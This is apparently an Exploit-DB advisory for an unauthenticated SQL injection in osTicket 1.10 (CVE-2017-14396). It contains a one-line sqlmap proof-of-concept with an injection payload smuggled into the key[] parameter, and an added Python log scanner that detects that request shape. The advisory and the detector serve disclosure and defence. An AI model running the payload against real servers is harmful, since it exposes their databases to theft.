osTicket 1.10 – SQL Injection (PoC)

  • Author: Mehmet Ince
    Date: 2017-09-12
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/42660/
  • 1. ADVISORY INFORMATION
    ========================================
    Title: osTicket v1.10 Unauthenticated SQL Injection
    Application: osTicket
    Bugs: SQL Injection
    Class: Sensitive Information disclosure
    Remotely Exploitable: Yes
    Authentication Required: NO
    Versions Affected: <= v1.10
    Technology: PHP
    Vendor URL: http://osticket.com/
    CVSSv3 Score: 10.0 (/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
    Date found: 12 Sep 2017
    Author: Mehmet Ince
    Advisory:
    
    Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396)

    2. CREDIT
    ========================================
    This vulnerability was identified during a penetration test by Mehmet INCE from PRODAFT / INVICTUS.

    3. VERSIONS AFFECTED
    ========================================
    osTicket < 1.10

    5. Technical Details & POC
    ========================================
    Please visit the advisory URL for technical details.

    PoC code:

    python sqlmap.py -u "http://target/file.php?key[id%60%3D1*%23]=1&signature=1&expires=15104725311" --dbms MySQL

    6. RISK
    ========================================
    The vulnerability allows remote attackers to execute a SQL query on the database system.

    7. REFERENCES
    ========================================
    Advisory | osTicket v1.10 Unauthenticated SQL Injection (CVE-2017-14396)
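
A defender-side check for the request shape shown in the PoC in section 5, as an added example that is not part of the original advisory: it scans web access logs for file.php requests whose key[...] parameter subscript decodes to anything other than a plain identifier (the PoC's subscript carries an encoded backtick, = and #). The combined log format, the sample lines and the identifier-only rule are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: a benign key[...] subscript, if one occurs at all, is a plain identifier.
SAFE_SUBSCRIPT = re.compile(r"[A-Za-z0-9_]+")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
KEY_PARAM = re.compile(r"key\[(.*)\]", re.S)


def suspicious_subscripts(url):
    """Return decoded key[...] subscripts of a file.php request that are not plain identifiers."""
    parts = urlsplit(url)
    if not parts.path.endswith("/file.php"):
        return []
    hits = []
    # parse_qsl percent-decodes parameter names, so %60 / %3D / %23 become ` = #
    for name, _value in parse_qsl(parts.query, keep_blank_values=True):
        m = KEY_PARAM.fullmatch(name)
        if m and not SAFE_SUBSCRIPT.fullmatch(m.group(1)):
            hits.append(m.group(1))
    return hits


def scan(log_lines):
    """Return (line_number, subscripts) for every log line holding a suspicious request."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if m:
            bad = suspicious_subscripts(m.group(1))
            if bad:
                findings.append((lineno, bad))
    return findings


# Constructed sample log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Sep/2017:10:00:01 +0000] "GET /file.php?key=abc123&signature=ab12&expires=1505300000 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Sep/2017:10:00:05 +0000] "GET /file.php?key[id%60%3D1%23]=1&signature=1&expires=15104725311 HTTP/1.1" 200 0',
    '192.0.2.10 - - [12/Sep/2017:10:00:09 +0000] "GET /index.php?key[id%60]=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, subs in scan(SAMPLE_LOG):
        print(f"line {lineno}: suspicious key[] subscript(s): {subs}")
```
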